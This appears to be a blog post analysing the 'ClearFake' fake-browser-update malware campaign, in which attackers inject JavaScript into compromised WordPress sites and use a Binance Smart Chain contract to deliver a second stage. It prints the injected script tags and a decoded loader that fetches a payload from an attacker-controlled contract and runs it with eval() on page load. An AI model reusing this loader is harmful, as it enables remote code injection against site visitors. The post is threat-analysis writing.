Over the past couple of months, a new wave of malware propagation through deceptive "fake-update" campaigns has emerged. This malicious tactic involves defacing websites with highly convincing overlays that demand a web browser update before granting access to the site. To the unsuspecting user, this seems like a routine update; however, in reality, these fraudulent "updates" conceal insidious infostealer malware variants such as RedLine, Amadey, or Lumma.
This specific campaign, dubbed "ClearFake" and discovered by cybersecurity expert Randy McEoin, initiates its assault on compromised WordPress websites. The attackers begin by embedding a concealed JavaScript code, acting as the initial "bridgehead." This code is injected into article pages, serving as a conduit to fetch a second-stage payload from a server controlled by malicious actors. This second-stage payload carries out the remainder of the site defacement.
The significance of this approach lies in its capacity to allow the attacker to remotely and instantaneously modify the infection process, enabling them to display any message of their choosing. This adaptability permits them to alter tactics, update blocked domains, and replace detected payloads without needing to revisit the compromised WordPress sites.
In the case of the "ClearFake" campaign, the second-stage code found its host on Cloudflare Workers. This was an effective strategy until Cloudflare took action to block these accounts, potentially disrupting the entire campaign.
However, this evolving iteration of "ClearFake" has introduced a novel method for hosting malicious code anonymously and without constraints. This is achieved through what is referred to as "Bullet Proof" hosting, facilitated by the Blockchain.
Which Blockchain Facility do they use?
For this, they use blockchain. Now the big question is why blockchain their is a bunch of Blockchain facility. Let's Find out the back history.
The recent evolution in the infection process appears deceptively similar to its predecessor, using identical domains and IP addresses. However, upon closer examination, we uncover new, unfamiliar network traffic directed towards servers under the control of Binance, one of the world's largest cryptocurrency exchanges. This raises the question of what connection Binance has with this situation. To understand further, let's dissect the modified variant of the initial stage code:
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlc
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
*********b2FkOw==">
</script>
These two script tags serve as the entry point for threat actors seeking to gain control over an entire WordPress site. Attackers insert this code into the primary template of a WordPress site, often exploiting vulnerabilities in plugins (such as Balada Injector), outdated WordPress versions, or utilizing stolen site credentials procured from the dark web.
The encoded code above is essentially decoded to execute the following on every page loaded from the compromised site:
javascript
// include <https://cdn.ethers.io/lib/ethers-5.2.umd.min.js>
async function load() {
let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
signer = provider.getSigner(),
address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
ABI = [
{ inputs: [{ internalType: "string", .......},
{ inputs: [], name: "get", ......},
{ inputs: [], name: "link", ....... },
],
contract = new ethers.Contract(address, ABI, provider),
link = await contract.get();
eval(atob(link));
}
window.onload = load;
This portion of the malicious code interacts with the Binance Smart Chain (BSC). It initiates a new contract instance by initializing it with an address controlled by the attacker. Additionally, it specifies the ABI (Application Binary Interface) that outlines the contract's functions and structure. The function called "get()," which queries the contract to retrieve a specific payload. This payload is subsequently decoded and evaluated as JavaScript code using the "eval()" function.
No comments:
Post a Comment